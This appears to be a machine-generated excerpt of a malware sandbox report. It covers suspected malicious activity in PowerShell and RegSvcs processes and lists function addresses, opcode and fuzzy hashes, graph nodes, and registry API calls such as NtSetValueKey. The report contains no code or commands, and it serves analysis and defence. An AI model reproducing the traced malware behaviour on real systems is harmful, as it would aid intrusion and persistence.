652 7ffb4c952699-7ffb4c9526bc 645->652 648->649 649->636 654 7ffb4c9526c0-7ffb4c9526c2 651->654 652->654 654->625 658 7ffb4c9526c8-7ffb4c952708 654->658 658->625 661->662 664 7ffb4c9528a1-7ffb4c95293f 662->664 665 7ffb4c952897-7ffb4c95289d 662->665 665->664
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000006.00000002.58462761818.00007FFB4C950000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4C950000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_6_2_7ffb4c950000_powershell.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: a4d0a0c2a121415361cd0e9049be54eb04770fdf89a5b94e01bbc7536e0c51af
                                                                                                                                                          • Instruction ID: a29d475c2956ef68fa7e0d1ad78419ddc8e104e60e7acfbf224427b072574bf9
                                                                                                                                                          • Opcode Fuzzy Hash: a4d0a0c2a121415361cd0e9049be54eb04770fdf89a5b94e01bbc7536e0c51af
                                                                                                                                                          • Instruction Fuzzy Hash: 2A11C8E7F2C91A1BE6E6B97CD5AD2BC52C2EF98A24F5402BBD41DC31C5DD189C490280

                                                                                                                                                          Executed Functions

                                                                                                                                                          Function 00007FFB4C921C92 Relevance: .6, Instructions: 575COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000008.00000002.58469824135.00007FFB4C920000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4C920000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_8_2_7ffb4c920000_powershell.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: af8d4a30a385f778139188d7d15adcb18014080b906d04f7f2377b1811467175
                                                                                                                                                          • Instruction ID: 96f5ac351050ac472c881518b45ad743c00f644a8e251cf6c8c1f2fa9116f25b
                                                                                                                                                          • Opcode Fuzzy Hash: af8d4a30a385f778139188d7d15adcb18014080b906d04f7f2377b1811467175
                                                                                                                                                          • Instruction Fuzzy Hash: 850235E1A0DB895FE79BAE78C8596747BE1EF56620B0805FBD08CC7193DE189C15C382
                                                                                                                                                          Function 00007FFB4C920C3E Relevance: .2, Instructions: 192COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000008.00000002.58469824135.00007FFB4C920000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4C920000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_8_2_7ffb4c920000_powershell.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: d87234406c344243314fc36c1772a72028c9213b012be1052021168e41043e94
                                                                                                                                                          • Instruction ID: cf0380bfd5cd47c6ca5f0169112e8b44a7e04eeb9c34b740ab894aad545c67ac
                                                                                                                                                          • Opcode Fuzzy Hash: d87234406c344243314fc36c1772a72028c9213b012be1052021168e41043e94
                                                                                                                                                          • Instruction Fuzzy Hash: AA5107F2E1EB4A2FE7AAEE3CC5591B966C1EF54610B4414BBD48DC71C2DD14AC058382
                                                                                                                                                          Function 00007FFB4C920C8A Relevance: .1, Instructions: 112COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000008.00000002.58469824135.00007FFB4C920000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4C920000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_8_2_7ffb4c920000_powershell.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: b0030edbeb8c0a8f290b90cafe98395c81f71207b4e2841fe0bde71f45de62f8
                                                                                                                                                          • Instruction ID: 52cc95578f9c934314ed03bf4e1330f90aefae1dc8f53f8ebe64f4f919a9114b
                                                                                                                                                          • Opcode Fuzzy Hash: b0030edbeb8c0a8f290b90cafe98395c81f71207b4e2841fe0bde71f45de62f8
                                                                                                                                                          • Instruction Fuzzy Hash: C431C7E3E1FA4A2BF7AABE7CCA5A17869C1EF94610B4414BBD48DC61D2DD18AC044242
                                                                                                                                                          Function 00007FFB4C921E5A Relevance: .1, Instructions: 69COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000008.00000002.58469824135.00007FFB4C920000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4C920000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_8_2_7ffb4c920000_powershell.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 5abffdece6695b45b670ca94463a3c0a64d2779fc8db319a37dc97208f178e0c
                                                                                                                                                          • Instruction ID: 09a14ddb3f5f7100d778ef0abef614abe92f46ff29ffcbab3cd0282b2f494c41
                                                                                                                                                          • Opcode Fuzzy Hash: 5abffdece6695b45b670ca94463a3c0a64d2779fc8db319a37dc97208f178e0c
                                                                                                                                                          • Instruction Fuzzy Hash: 35110CE6F1C91A1AE7E6BDFCD9AD2BC52C6EFD4A20B440577C45DC3185DD189C150282
                                                                                                                                                          Function 00007FFB4C8537B5 Relevance: .0, Instructions: 49COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000008.00000002.58468809766.00007FFB4C850000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4C850000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_8_2_7ffb4c850000_powershell.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: bb41c5088c83ff3ff9212e5f6e9c405d94860b8db11be397b3e57a14267cfe5e
                                                                                                                                                          • Instruction ID: 6fa8789f5687db6429e380cdad07c342d541898092a8b1266d885c221d07a063
                                                                                                                                                          • Opcode Fuzzy Hash: bb41c5088c83ff3ff9212e5f6e9c405d94860b8db11be397b3e57a14267cfe5e
                                                                                                                                                          • Instruction Fuzzy Hash: A001A77010CB0C4FD748EF0CE451AB6B7E0FB85320F10052EE58AC3261D632E882CB41
                                                                                                                                                          Function 00007FFB4C8550E1 Relevance: .0, Instructions: 25COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000008.00000002.58468809766.00007FFB4C850000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4C850000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_8_2_7ffb4c850000_powershell.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: d46f4f4e515f5dd19c659b2c8a09c6290ddf029f5e8c173ad80eea47dbb7c973
                                                                                                                                                          • Instruction ID: e5c7964e6c565e9c4592ee6128c32695fd304443a63608790e7adbd65f3e639c
                                                                                                                                                          • Opcode Fuzzy Hash: d46f4f4e515f5dd19c659b2c8a09c6290ddf029f5e8c173ad80eea47dbb7c973
                                                                                                                                                          • Instruction Fuzzy Hash: 56F017B4E1820B8BDB00EFA4C5855BEB7B0EB44310F208526C016EA280EB78AA448B80
                                                                                                                                                          Function 00007FFB4C859658 Relevance: .0, Instructions: 24COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000008.00000002.58468809766.00007FFB4C850000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4C850000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_8_2_7ffb4c850000_powershell.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 996a122f9a2ae0e2d06c1df0b3950cc3d6ae6fd526b03b8095b77369e371d9a2
                                                                                                                                                          • Instruction ID: 254d534c587abad9692962d632bdbd5c2c11eb134abc2baa10d96fb91ccbc633
                                                                                                                                                          • Opcode Fuzzy Hash: 996a122f9a2ae0e2d06c1df0b3950cc3d6ae6fd526b03b8095b77369e371d9a2
                                                                                                                                                          • Instruction Fuzzy Hash: 92E0C2B5B4C90907E758BA3CE4061B973C1EF88611B45863BD84EC2282DD6CED814380
                                                                                                                                                          Function 00007FFB4C855FB5 Relevance: .0, Instructions: 24COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000008.00000002.58468809766.00007FFB4C850000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4C850000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_8_2_7ffb4c850000_powershell.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 6bb604639223efcec245c0bd22a3504127af6fabe6a38456869b2f670074911c
                                                                                                                                                          • Instruction ID: 77ac4ed61b4021d726f951edabfff76473bab91966fdcb7a8575934b593b87f9
                                                                                                                                                          • Opcode Fuzzy Hash: 6bb604639223efcec245c0bd22a3504127af6fabe6a38456869b2f670074911c
                                                                                                                                                          • Instruction Fuzzy Hash: A6E068E260C7010FD308BFB8C45A539F3C1EF8260030050BFD69A831E3D8AD190A8300
                                                                                                                                                          Function 00007FFB4C8591BF Relevance: .0, Instructions: 11COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000008.00000002.58468809766.00007FFB4C850000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4C850000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_8_2_7ffb4c850000_powershell.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: e1d48d1ff8d7082587831e7a406b34eb3c1619b8831c351a242c584725f089d2
                                                                                                                                                          • Instruction ID: 2e20501ddd6b62e98864554f9303800ff9aa44274fd28401f46367c80bd18243
                                                                                                                                                          • Opcode Fuzzy Hash: e1d48d1ff8d7082587831e7a406b34eb3c1619b8831c351a242c584725f089d2
                                                                                                                                                          • Instruction Fuzzy Hash: BCC0C0B140C11147D12C6C3481010317336FB04500320103FC483431D38E7E2C02CB00

                                                                                                                                                          Execution Graph

                                                                                                                                                          Execution Coverage:27.8%
                                                                                                                                                          Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                          Signature Coverage:50%
                                                                                                                                                          Total number of Nodes:12
                                                                                                                                                          Total number of Limit Nodes:0
                                                                                                                                                          execution_graph 282 d20ee0 283 d20f28 NtSetValueKey 282->283 284 d20faa 283->284 300 d20cb0 301 d20cb8 RegOpenKeyExW 300->301 303 d20d96 301->303 292 d20ed8 293 d20edd NtSetValueKey 292->293 295 d20faa 293->295 296 d20ff9 297 d21000 RegCloseKey 296->297 299 d2108f 297->299

                                                                                                                                                          Callgraph

                                                                                                                                                          • Executed
                                                                                                                                                          • Not Executed
                                                                                                                                                          • Opacity -> Relevance
                                                                                                                                                          • Disassembly available
                                                                                                                                                          callgraph 0 Function_00D20450 1 Function_00D208D0 2 Function_00D201D4 3 Function_00D20054 4 Function_00D200D4 5 Function_00D20154 6 Function_00D20E58 7 Function_00D20ED8 8 Function_00D20DD9 9 Function_00D2045C 10 Function_00D20847 11 Function_00D20444 12 Function_00D20C48 13 Function_00D20148 14 Function_00D200C8 15 Function_00D20848 16 Function_00D201C8 17 Function_00D20070 18 Function_00D200F0 19 Function_00D20170 20 Function_00D20471 21 Function_00D201F4 22 Function_00D20475 23 Function_00D204F5 24 Function_00D209FA 24->12 25 Function_00D204F8 24->25 60 Function_00D20C38 24->60 26 Function_00D20479 27 Function_00D20FF9 28 Function_00D2017C 29 Function_00D2047D 30 Function_00D20EE0 31 Function_00D208E0 32 Function_00D20160 33 Function_00D20060 34 Function_00D200E4 35 Function_00D201E4 36 Function_00D20DE8 37 Function_00D20E68 38 Function_00D20469 39 Function_00D2046D 40 Function_00D20210 41 Function_00D20090 42 Function_00D20194 43 Function_00D2011C 44 Function_00D2021C 45 Function_00D21000 46 Function_00D20080 47 Function_00D20100 48 Function_00D20481 49 Function_00D20204 50 Function_00D20485 51 Function_00D20188 52 Function_00D20489 53 Function_00D2010C 54 Function_00D2048D 55 Function_00D200B0 56 Function_00D20CB0 57 Function_00D204B1 58 Function_00D204B5 59 Function_00D20CB8 61 Function_00D20239 62 Function_00D2013C 63 Function_00D200BC 64 Function_00D201BC 65 Function_00D200A0 66 Function_00D201A0 67 Function_00D204A5 68 Function_00D20228 69 Function_00D204A9 70 Function_00D2012C 71 Function_00D201AC 72 Function_00D20A2C 72->25 73 Function_00D204AD

                                                                                                                                                          Executed Functions

                                                                                                                                                          Function 00D20ED8 Relevance: 1.6, APIs: 1, Instructions: 107nativeCOMMON
                                                                                                                                                          Download Yara Rule

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          • Executed
                                                                                                                                                          • Not Executed
                                                                                                                                                          control_flow_graph 17 d20ed8-d20fa8 NtSetValueKey 21 d20fb1-d20fe9 17->21 22 d20faa-d20fb0 17->22 22->21
                                                                                                                                                          APIs
                                                                                                                                                          • NtSetValueKey.NTDLL(?,?,?,?,?,?), ref: 00D20F98
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000B.00000002.58298418331.0000000000D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D20000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_11_2_d20000_RegSvcs.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Value
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 3702945584-0
                                                                                                                                                          • Opcode ID: 10a27d292c96394658088113f6f806f7a7480c8519bc44b363a821e80732a78a
                                                                                                                                                          • Instruction ID: e6f2968252b44c376490e9f643f3c04e1f4ef137e89e048eea23a123b5ef9549
                                                                                                                                                          • Opcode Fuzzy Hash: 10a27d292c96394658088113f6f806f7a7480c8519bc44b363a821e80732a78a
                                                                                                                                                          • Instruction Fuzzy Hash: B64186B9D042589FCF10CFA9E984A9EFBB1BB1A310F24A41AE814B7350D375A941CF64
                                                                                                                                                          Function 00D20EE0 Relevance: 1.6, APIs: 1, Instructions: 104nativeCOMMON
                                                                                                                                                          Download Yara Rule

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          • Executed
                                                                                                                                                          • Not Executed
                                                                                                                                                          control_flow_graph 25 d20ee0-d20fa8 NtSetValueKey 27 d20fb1-d20fe9 25->27 28 d20faa-d20fb0 25->28 28->27
                                                                                                                                                          APIs
                                                                                                                                                          • NtSetValueKey.NTDLL(?,?,?,?,?,?), ref: 00D20F98
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000B.00000002.58298418331.0000000000D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D20000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_11_2_d20000_RegSvcs.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Value
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 3702945584-0
                                                                                                                                                          • Opcode ID: 629eb0aa61c84f05eeabb13ee7c150301e6c3921f92af21a8763b4b74979fd01
                                                                                                                                                          • Instruction ID: f6eab97b72bdec4f64c59d80196744731e2091b1124a4a04cc6fbcf681db537f
                                                                                                                                                          • Opcode Fuzzy Hash: 629eb0aa61c84f05eeabb13ee7c150301e6c3921f92af21a8763b4b74979fd01
                                                                                                                                                          • Instruction Fuzzy Hash: 2F3157B9D042589FCF10CFA9E984A9EFBF1BB19310F24A41AE814B7310D375A945CF64
                                                                                                                                                          Function 00D209FA Relevance: .2, Instructions: 165COMMON
                                                                                                                                                          Download Yara Rule

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          • Executed
                                                                                                                                                          • Not Executed
                                                                                                                                                          control_flow_graph 46 d209fa-d20a0a 47 d20a0c 46->47 48 d20a2d 46->48 87 d20a0c call d20c48 47->87 88 d20a0c call d20c38 47->88 49 d20a34-d20a3f 48->49 51 d20a41-d20a6c call d204ec 49->51 52 d20a84-d20abd call d204ec 49->52 50 d20a12-d20a22 50->49 58 d20a71-d20a82 51->58 59 d20abe-d20b42 52->59 58->59 64 d20b44-d20b78 call d204f8 59->64 65 d20b9d-d20bcf call d20504 59->65 73 d20b7a-d20b89 64->73 74 d20b8b-d20b98 64->74 72 d20bd4-d20bf6 65->72 79 d20bf8-d20c07 72->79 80 d20c09-d20c16 72->80 78 d20b99-d20b9b 73->78 74->78 81 d20c18-d20c1b call d20510 78->81 85 d20c17 79->85 80->85 86 d20c20-d20c2b 81->86 85->81 87->50 88->50
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000B.00000002.58298418331.0000000000D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D20000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_11_2_d20000_RegSvcs.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 34c5f1d15c1f011eb0044a15c6e042e1a8113baf9aed1b0db73d967b5d4f435d
                                                                                                                                                          • Instruction ID: 3b969d02592114e7c4e7044b7a0543d5f26d62c332872fe3b7bba4c2c0eba581
                                                                                                                                                          • Opcode Fuzzy Hash: 34c5f1d15c1f011eb0044a15c6e042e1a8113baf9aed1b0db73d967b5d4f435d
                                                                                                                                                          • Instruction Fuzzy Hash: 4361D474D012189FCB24DFA4E844BEDBBB1FF59304F24916AD509B3251DB30AA86CF64
                                                                                                                                                          Function 00D20CB0 Relevance: 1.6, APIs: 1, Instructions: 112registryCOMMON
                                                                                                                                                          Download Yara Rule

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          • Executed
                                                                                                                                                          • Not Executed
                                                                                                                                                          control_flow_graph 0 d20cb0-d20d1f 3 d20d33-d20d94 RegOpenKeyExW 0->3 4 d20d21-d20d30 0->4 5 d20d96-d20d9c 3->5 6 d20d9d-d20dd3 3->6 4->3 5->6
                                                                                                                                                          APIs
                                                                                                                                                          • RegOpenKeyExW.KERNELBASE(?,?,?,?,?), ref: 00D20D84
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000B.00000002.58298418331.0000000000D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D20000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_11_2_d20000_RegSvcs.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Open
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 71445658-0
                                                                                                                                                          • Opcode ID: a9de0d6aa25faf1c3c040443d2466c3bf7afdc70b57849c18a056f75f73882ab
                                                                                                                                                          • Instruction ID: 7bde6d22e93408372d9b66195b8223013c5c67b537ef3bcbe89f7d2b252ba911
                                                                                                                                                          • Opcode Fuzzy Hash: a9de0d6aa25faf1c3c040443d2466c3bf7afdc70b57849c18a056f75f73882ab
                                                                                                                                                          • Instruction Fuzzy Hash: 044188B8D012589FCF10CFAAD884ADEFBB5BB59314F14902AE818B7310D374A946CF64
                                                                                                                                                          Function 00D20CB8 Relevance: 1.6, APIs: 1, Instructions: 108registryCOMMON
                                                                                                                                                          Download Yara Rule

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          • Executed
                                                                                                                                                          • Not Executed
                                                                                                                                                          control_flow_graph 9 d20cb8-d20d1f 11 d20d33-d20d94 RegOpenKeyExW 9->11 12 d20d21-d20d30 9->12 13 d20d96-d20d9c 11->13 14 d20d9d-d20dd3 11->14 12->11 13->14
                                                                                                                                                          APIs
                                                                                                                                                          • RegOpenKeyExW.KERNELBASE(?,?,?,?,?), ref: 00D20D84
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000B.00000002.58298418331.0000000000D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D20000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_11_2_d20000_RegSvcs.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Open
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 71445658-0
                                                                                                                                                          • Opcode ID: c85c1fe71e415ca75b50ffb29e78b356dbae864e18fc2764f2add72aa333a6bd
                                                                                                                                                          • Instruction ID: 62e02aafd8ed6723a042dd9884dfbe52237a8d90a3a98a5c234f9b2ac2739e23
                                                                                                                                                          • Opcode Fuzzy Hash: c85c1fe71e415ca75b50ffb29e78b356dbae864e18fc2764f2add72aa333a6bd
                                                                                                                                                          • Instruction Fuzzy Hash: 4F4166B8D052589FCB10CFAAD884ADEFBB5BB59314F14902AE818B7210D374A946CF64
                                                                                                                                                          Function 00D20FF9 Relevance: 1.6, APIs: 1, Instructions: 75registryCOMMON
                                                                                                                                                          Download Yara Rule

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          • Executed
                                                                                                                                                          • Not Executed
                                                                                                                                                          control_flow_graph 31 d20ff9-d2103d 33 d21045-d2108d RegCloseKey 31->33 34 d21096-d210d0 33->34 35 d2108f-d21095 33->35 35->34
                                                                                                                                                          APIs
                                                                                                                                                          • RegCloseKey.KERNELBASE(?), ref: 00D2107D
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000B.00000002.58298418331.0000000000D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D20000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_11_2_d20000_RegSvcs.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Close
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 3535843008-0
                                                                                                                                                          • Opcode ID: dde4903f9e20a9b3830c3acf2042ad2df9875f5d55f70940d01f1d3998c97c0e
                                                                                                                                                          • Instruction ID: 540f2941b7582e221111bddacd7f213db98ed0559e8472b33784ad80803c8a1d
                                                                                                                                                          • Opcode Fuzzy Hash: dde4903f9e20a9b3830c3acf2042ad2df9875f5d55f70940d01f1d3998c97c0e
                                                                                                                                                          • Instruction Fuzzy Hash: 4E31CBB8D01258AFCB10CFAAE884A9EFBF4EB59314F14842AE814B7310C335A945CF64
                                                                                                                                                          Function 00D21000 Relevance: 1.6, APIs: 1, Instructions: 71registryCOMMON
                                                                                                                                                          Download Yara Rule

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          • Executed
                                                                                                                                                          • Not Executed
                                                                                                                                                          control_flow_graph 39 d21000-d2108d RegCloseKey 41 d21096-d210d0 39->41 42 d2108f-d21095 39->42 42->41
                                                                                                                                                          APIs
                                                                                                                                                          • RegCloseKey.KERNELBASE(?), ref: 00D2107D
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000B.00000002.58298418331.0000000000D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D20000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_11_2_d20000_RegSvcs.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Close
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 3535843008-0
                                                                                                                                                          • Opcode ID: 579fd9e20d015c27b26d2d8c3278e503a11b75aab3c16bd6a39d2c8ce76e116a
                                                                                                                                                          • Instruction ID: 402984f3b913a01c6044a7d9212393130c95cbd26c13e3c69022659eeac3524a
                                                                                                                                                          • Opcode Fuzzy Hash: 579fd9e20d015c27b26d2d8c3278e503a11b75aab3c16bd6a39d2c8ce76e116a
                                                                                                                                                          • Instruction Fuzzy Hash: 3C31BBB8D012589FCB10CFAAE984A9EFBF4FB59314F14842AE818B7310C335A941CF64

                                                                                                                                                          Executed Functions

                                                                                                                                                          Function 0651237F Relevance: 1.6, Strings: 1, Instructions: 305COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000C.00000002.59538034117.0000000006510000.00000040.00000800.00020000.00000000.sdmp, Offset: 06510000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_12_2_6510000_RegSvcs.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: ECq
                                                                                                                                                          • API String ID: 0-2706903857
                                                                                                                                                          • Opcode ID: 91a52a7d733af6de3e03aaccea55e21072116ac994c982dea257f2d51ba1f52b
                                                                                                                                                          • Instruction ID: 7d528370d99c8c0e97dac10e89fd33d8114a4a056d844af71bc84d78a95bb270
                                                                                                                                                          • Opcode Fuzzy Hash: 91a52a7d733af6de3e03aaccea55e21072116ac994c982dea257f2d51ba1f52b
                                                                                                                                                          • Instruction Fuzzy Hash: 1FD11F74B10115CFD745EF64E9A8A6E77F2FB88300F1185A9E8499B398DF30AD428F85
                                                                                                                                                          Function 06512388 Relevance: 1.5, Strings: 1, Instructions: 291COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000C.00000002.59538034117.0000000006510000.00000040.00000800.00020000.00000000.sdmp, Offset: 06510000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_12_2_6510000_RegSvcs.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: ECq
                                                                                                                                                          • API String ID: 0-2706903857
                                                                                                                                                          • Opcode ID: e89ce1006858aaec86d16052c52047c28b34416ff1c8985ca140b66025db4a5d
                                                                                                                                                          • Instruction ID: 2c800ccda75bbe322b311134200ebb5c03807f2c8d3b684f9894ec1b71858b72
                                                                                                                                                          • Opcode Fuzzy Hash: e89ce1006858aaec86d16052c52047c28b34416ff1c8985ca140b66025db4a5d
                                                                                                                                                          • Instruction Fuzzy Hash: 00C11F74F10115CFD745EF64E9A8A6E77F2FB88300F1185A9E8499B398DE30AD428F85
                                                                                                                                                          Function 06510006 Relevance: 1.5, Instructions: 1518COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000C.00000002.59538034117.0000000006510000.00000040.00000800.00020000.00000000.sdmp, Offset: 06510000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_12_2_6510000_RegSvcs.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: ef9b7e56e933ecce862b2551ba8dd30295e8004c9a714c3f5dbbec61608c6c12
                                                                                                                                                          • Instruction ID: 75cec61980489d1e63bec0a32b07d6f60a87a8830cb1ab9c6d52991742dc4f59
                                                                                                                                                          • Opcode Fuzzy Hash: ef9b7e56e933ecce862b2551ba8dd30295e8004c9a714c3f5dbbec61608c6c12
                                                                                                                                                          • Instruction Fuzzy Hash: 99F2C874B20105DFC745EF64D9A4E6A77F2FF88704F5186A9E44A9B368CA30AD42CF81
                                                                                                                                                          Function 06510040 Relevance: 1.5, Instructions: 1507COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000C.00000002.59538034117.0000000006510000.00000040.00000800.00020000.00000000.sdmp, Offset: 06510000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_12_2_6510000_RegSvcs.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 479d29d0178bd4c98fd49f216311610cde5360545c712d13656bbf7a29437a01
                                                                                                                                                          • Instruction ID: df04e406c273b72141683dfb4eb0da3bb2e6f0a7b39641dfde412f31b45f5ada
                                                                                                                                                          • Opcode Fuzzy Hash: 479d29d0178bd4c98fd49f216311610cde5360545c712d13656bbf7a29437a01
                                                                                                                                                          • Instruction Fuzzy Hash: 1BF2C874B20104DFC745EF64D9A4E6A77F2FB8C704F5186A9E44A9B368CA30AD42CF81
                                                                                                                                                          Function 06512454 Relevance: 1.5, Strings: 1, Instructions: 247COMMON
